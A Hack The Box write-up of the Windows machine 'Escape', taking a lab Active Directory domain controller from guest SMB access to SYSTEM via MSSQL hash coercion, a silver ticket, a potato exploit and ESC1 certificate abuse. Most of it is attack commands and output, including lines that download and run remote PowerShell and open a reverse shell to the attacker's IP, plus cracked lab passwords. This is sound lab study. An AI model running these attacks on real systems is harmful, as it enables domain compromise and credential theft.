# Escape - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Escape is an excellent medium-rated Windows machine created by [Geiseric](https://twitter.com/geiseric4)

It starts with guest access in SMB share, which allows us to find MSSQL credentials.  
We can then coerce a Net-NTLMv2 authentication with `xp_dirtree` and UNC path injection.  
Then we can use a silver ticket attack to impersonate as Administrator and enable `xp_cmdshell`. Finally, `SeImpersonatePrivilege` can be exploited with `JuicyPotatoNG` to get shell as `system`.  
For the intended approach, we were expected to find `Ryan.Cooper`'s credentials in SQLServer logs.  
Then we were expected to find the template `UserAuthentication` vulnerable to ESC1 and abuse it to get shell as `system`.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.15s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49698/tcp open  unknown
49702/tcp open  unknown
65336/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49677,49678,49698,49702,65336 -oN escape.nmap 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-26 03:11:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-02-26T03:13:20+00:00; +7h59m53s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-02-26T03:13:21+00:00; +7h59m53s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-02-23T19:58:27
|_Not valid after:  2053-02-23T19:58:27
|_ssl-date: 2023-02-26T03:13:20+00:00; +7h59m53s from scanner time.
| ms-sql-ntlm-info: 
|   Target_Name: sequel
|   NetBIOS_Domain_Name: sequel
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: sequel.htb
|   DNS_Computer_Name: dc.sequel.htb
|   DNS_Tree_Name: sequel.htb
|_  Product_Version: 10.0.17763
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T03:13:20+00:00; +7h59m53s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T03:13:21+00:00; +7h59m53s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
65336/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-02-26T03:12:42
|_  start_date: N/A
| ms-sql-info: 
|   10.129.162.48:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: 7h59m52s, deviation: 0s, median: 7h59m52s
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -h 10.10.11.202 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=sequel,DC=htb
ldapServiceName: sequel.htb:dc$@SEQUEL.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=sequel,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
 ion,DC=sequel,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=sequel,DC=htb
namingContexts: CN=Configuration,DC=sequel,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=DomainDnsZones,DC=sequel,DC=htb
namingContexts: DC=ForestDnsZones,DC=sequel,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 160054
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=sequel,DC=htb
dnsHostName: dc.sequel.htb
defaultNamingContext: DC=sequel,DC=htb
currentTime: 20230627020603.0Z
configurationNamingContext: CN=Configuration,DC=sequel,DC=htb
```

We have the FQDN `dc.sequel.htb` here; we can add it to `/etc/hosts`:

```text
10.10.11.202 dc.sequel.htb sequel.htb
```

## SMB enumeration

We can enumerate SMB shares. `CrackMapExec` is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec cme:latest
root@d2016ad74c29:~# echo '10.10.11.202 dc.sequel.htb sequel.htb' >> /etc/hosts
```

Testing for null session:

```console
root@d2016ad74c29:~# cme smb 10.10.11.202 -d sequel.htb -u '' -p '' --shares
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\: 
SMB         10.10.11.202    445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Testing for guest session:

```console
root@d2016ad74c29:~# cme smb 10.10.11.202 -d sequel.htb -u 'opcode' -p '' --shares
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\opcode: 
SMB         10.10.11.202    445    DC               [+] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON                        Logon server share 
SMB         10.10.11.202    445    DC               Public          READ            
SMB         10.10.11.202    445    DC               SYSVOL                          Logon server share
```

Guest sessions are enabled.  
Since we can read `IPC$` share, we can attempt RID cycling:

```console
root@d2016ad74c29:~# cme smb 10.10.11.202 -d sequel.htb -u 'opcode' -p '' --rid-brute
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\opcode: 
SMB         10.10.11.202    445    DC               [+] Brute forcing RIDs
SMB         10.10.11.202    445    DC               498: sequel\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               500: sequel\Administrator (SidTypeUser)
SMB         10.10.11.202    445    DC               501: sequel\Guest (SidTypeUser)
SMB         10.10.11.202    445    DC               502: sequel\krbtgt (SidTypeUser)
SMB         10.10.11.202    445    DC               512: sequel\Domain Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               513: sequel\Domain Users (SidTypeGroup)
SMB         10.10.11.202    445    DC               514: sequel\Domain Guests (SidTypeGroup)
SMB         10.10.11.202    445    DC               515: sequel\Domain Computers (SidTypeGroup)
SMB         10.10.11.202    445    DC               516: sequel\Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               517: sequel\Cert Publishers (SidTypeAlias)
SMB         10.10.11.202    445    DC               518: sequel\Schema Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               519: sequel\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               520: sequel\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.202    445    DC               521: sequel\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               522: sequel\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               525: sequel\Protected Users (SidTypeGroup)
SMB         10.10.11.202    445    DC               526: sequel\Key Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               527: sequel\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               553: sequel\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.202    445    DC               571: sequel\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.202    445    DC               572: sequel\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.202    445    DC               1000: sequel\DC$ (SidTypeUser)
SMB         10.10.11.202    445    DC               1101: sequel\DnsAdmins (SidTypeAlias)
SMB         10.10.11.202    445    DC               1102: sequel\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.202    445    DC               1103: sequel\Tom.Henn (SidTypeUser)
SMB         10.10.11.202    445    DC               1104: sequel\Brandon.Brown (SidTypeUser)
SMB         10.10.11.202    445    DC               1105: sequel\Ryan.Cooper (SidTypeUser)
SMB         10.10.11.202    445    DC               1106: sequel\sql_svc (SidTypeUser)
SMB         10.10.11.202    445    DC               1107: sequel\James.Roberts (SidTypeUser)
SMB         10.10.11.202    445    DC               1108: sequel\Nicole.Thompson (SidTypeUser)
SMB         10.10.11.202    445    DC               1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
```

It worked. I tried to look for AS-REProastable accounts but didn't find any.

We can instead look at the other share: `Public`  
I prefer to use [impacket](https://github.com/fortra/impacket) to explore SMB shares:

```console
opcode@parrot$ smbclient.py sequel.htb/opcode@dc.sequel.htb -no-pass
# use Public
# ls
drw-rw-rw-          0  Sat Nov 19 17:21:25 2022 .
drw-rw-rw-          0  Sat Nov 19 17:21:25 2022 ..
-rw-rw-rw-      49551  Sat Nov 19 17:21:25 2022 SQL Server Procedures.pdf
# mget *
[*] Downloading SQL Server Procedures.pdf
```

The first page of the PDF explains how to connect to MSSQL

![1](images/1.png)

The second page has a set of credentials:

![2](images/2.png)

## Coercion via `xp_dirtree` in MSSQL to steal NetNTLMv2 hash

The credentials can be used to authenticate to MSSQL server:

```console
opcode@parrot$ mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)> 
```

We can try to run OS commands via `xp_cmdshell`:

```console
SQL (PublicUser  guest@master)> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
```

It's disabled. We can also enumerate the database:

```console
SQL (PublicUser  guest@master)> select suser_name()
----------
PublicUser

SQL (PublicUser  guest@master)> SELECT Name from sys.Databases
Name
------
master
tempdb
model
msdb
```

I looked inside and didn't find anything interesting.

We can also attempt to coerce a Net-NTLMv2 authentication with `xp_dirtree` and then grab the hash with [Responder](<https://github.com/lgandx/Responder>)

First, start `Responder.py` in a separate terminal:

```console
opcode@parrot$ sudo ./Responder.py -I tun0 -Pv
```

Now,

```console
SQL (PublicUser  guest@master)> xp_dirtree \\10.10.14.126\opcode
subdirectory   depth   file   
------------   -----   ----   
```

And we'd get `sql_svc`'s NetNTLMv2 hash:

```text
[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:4775a1096cdd0a50:AB154597EDBC1A8D8169BC86B997E2BC:01010000000000008084907228A9D9018A7C2B8AB2FDB38A000000000200080051004A005200580001001E00570049004E002D00370046004F0035004800490050005500340031005A0004003400570049004E002D00370046004F0035004800490050005500340031005A002E0051004A00520058002E004C004F00430041004C000300140051004A00520058002E004C004F00430041004C000500140051004A00520058002E004C004F00430041004C00070008008084907228A9D90106000400020000000800300030000000000000000000000000300000B6DB568F8A8BD1F01369EEDAEF5A08DB8A98DE86AD2A2451C748C5F26E32B0910A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100320036000000000000000000
```

We can attempt to crack it with `john`:

```console
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

It quickly cracks, and we get a set of credentials:

```text
sql_svc:REGGIE1234ronnie
```

## Unintended approach - Silver Ticket Attack

`sql_svc` is likely a service account associated with MSSQLSvc.  
In that case, we should be able to perform a Silver Ticket Attack to forge a ticket and trick MSSQL into acknowledging us as the Administrator.

First, we need to get the domain SID of the target domain:

```console
opcode@parrot$ rpcclient -U sql_svc%REGGIE1234ronnie 10.10.11.202
rpcclient $> lookupnames Administrator
Administrator S-1-5-21-4078382237-1492182817-2568127209-500 (User: 1)
```

The domain SID is `S-1-5-21-4078382237-1492182817-2568127209`  
Next, we want the NTHash of the password:

```console
opcode@parrot$ python3 -c "print(__import__('binascii').hexlify(__import__('hashlib').new('md4', 'REGGIE1234ronnie'.encode('utf-16le')).digest()))"
b'1443ec19da4dac4ffc953bca1b57b4cf'
```

Finally, we can use `ticketer.py` to forge a silver ticket.  
But first, we need to sync time as we are about to use kerberos authentication:

```console
opcode@parrot$ sudo ntpdate sequel.htb
opcode@parrot$ ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn MSSQLSvc/dc.sequel.htb Administrator
```

Using this ticket, we can connect to MSSQL and impersonate Administrator:

```console
opcode@parrot$ export KRB5CCNAME=Administrator.ccache
opcode@parrot$ mssqlclient.py dc.sequel.htb -k -no-pass
```

Now that we are "Administrator", we can enable `xp_cmdshell`:

```console
SQL (sequel\Administrator  dbo@master)> enable_xp_cmdshell
SQL (sequel\Administrator  dbo@master)> RECONFIGURE
```

We should be able to run OS commands now:

```console
SQL (sequel\Administrator  dbo@master)> xp_cmdshell whoami
output           
--------------   
sequel\sql_svc   
```

Next, I used [ConPtyShell](https://github.com/antonioCoco/ConPtyShell) to get a shell:

```console
SQL (sequel\Administrator  dbo@master)> xp_cmdshell "powershell.exe IEX(IWR http://10.10.14.126:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.126 9001"
```

And I got a shell:

```console
PS C:\> whoami
sequel\sql_svc
```

## Unintended approach - Exploiting SeImpersonatePrivilege with JuicyPotatoNG

```console
PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

We have the SeImpersonatePrivilege; therefore a potato exploit can be used.
I used <https://github.com/antonioCoco/JuicyPotatoNG>

```console
PS C:\Windows\Tasks> .\JuicyPotatoNG.exe -t * -p "cmd.exe" -a "/c powershell.exe IEX(IWR http://10.10.14.126:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.126 9001"
```

With that, I got shell as `system`:

```console
PS C:\Windows\system32> whoami
nt authority\system
```

## Intended approach - Finding credentials in logs

`sql_svc` is a member of Remote Management Users, so we can login with `evil-winrm`:

```console
opcode@parrot$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
```

Inside `C:\SQLServer\Logs`, we have a log file, `ERRORLOG.BAK`:

```console
*Evil-WinRM* PS C:\SQLServer\Logs> ls

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK
```

```console
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
[--SNIP--]
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[--SNIP--]
```

Apparently, the user used the username instead of the password by mistake, and it got logged.  
`Ryan.Cooper` is also a member of Remote Management Users, so we can login with `evil-winrm`:

```console
evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
```

## Intended approach - PE by exploiting ESC1

We can enumerate attack paths with [adPEAS](https://github.com/61106960/adPEAS):

```console
PS C:\> IEX(IWR http://10.10.14.126:8000/adPEAS.ps1 -UseBasicParsing) 
PS C:\> Invoke-adPEAS 
```

We'd see a bunch of warnings when it enumerates ADCS:

```console
[?] +++++ Checking Template 'UserAuthentication' +++++
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT' 
[!] Identity 'sequel\sql_svc' has 'GenericAll' permissions on template 'UserAuthentication'
[+] Identity 'sequel\Domain Users' has enrollment rights for template 'UserAuthentication' 
Template Name:                          UserAuthentication
Template distinguishedname:             CN=UserAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb 
Date of Creation:                       11/18/2022 21:10:22
[+] Extended Key Usage:                 Client Authentication, Secure E-mail, Encrypting File System
EnrollmentFlag:                         INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
[!] CertificateNameFlag:                ENROLLEE_SUPPLIES_SUBJECT 
[!] Template Permissions:               sequel\sql_svc : GenericAll 
[+] Enrollment allowed for:             sequel\Domain Users
```

Instead of manually parsing them to identify the vulnerabilty, we can let [Certipy](https://github.com/ly4k/Certipy) do it for us:

```console
opcode@parrot$ certipy find -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip 10.10.11.202 -vulnerable -stdout
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : 16777216
                                          65536
                                          ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
```

It found the template `UserAuthentication` vulnerable to ESC1  
We can check the boxes ourselves:

- CA gives enrollment rights to Domain Users
- Manager approval is disabled
- Authorized signatures are not required
- Template security descriptor grants enrollment rights to Domain Users
- The certificate template has Client Authentication in Extended Key Usage
- Enrollee Supplies Subject is True, and Certificate Name Flag is EnrolleeSuppliesSubject

We can use `certipy` for exploitation as well:

```console
opcode@parrot$ certipy req -username Ryan.Cooper@sequel.htb -password NuclearMosquito3 -ca sequel-DC-CA -target dc.sequel.htb -template UserAuthentication -upn administrator@sequel.htb -dns dc.sequel.htb -debug
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc.sequel.htb' at '192.168.32.2'
[+] Trying to resolve 'SEQUEL.HTB' at '192.168.32.2'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with multiple identifications
    UPN: 'administrator@sequel.htb'
    DNS Host Name: 'dc.sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_dc.pfx'
```

I don't know why, but it always works after a couple of tries.  
Now, we can perform Pass-the-Certificate to obtain a TGT and authenticate.  
`certipy` can do that as well:

```console
opcode@parrot$ sudo ntpdate sequel.htb
opcode@parrot$ certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.11.202 -username administrator -domain sequel.htb
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
    [0] UPN: 'administrator@sequel.htb'
    [1] DNS Host Name: 'dc.sequel.htb'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
```

For identification, I selected 0.

Now, we can use the ticket with `psexec`:

```console
opcode@parrot$ export KRB5CCNAME=administrator.ccache
opcode@parrot$ psexec.py -no-pass -k sequel.htb/administrator@dc.sequel.htb
```

With that, we can shell as `system`:

```console
C:\Windows\system32> whoami
nt authority\system
```

I also want to document this part using [Certify](https://github.com/GhostPack/Certify).

```console
PS C:\> IEX(IWR http://10.10.14.126:8000/ADCS/Invoke-Certify.ps1 -UseBasicParsing) 
```

We can enumerate vulnerable templates:

```console
PS C:\> Invoke-Certify find /vulnerable 

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512 
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                         : dc.sequel.htb\sequel-DC-CA
    Template Name                   : UserAuthentication
    Schema Version                  : 2
    Validity Period                 : 10 years
    Renewal Period                  : 6 weeks
    msPKI-Certificates-Name-Flag    : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
```

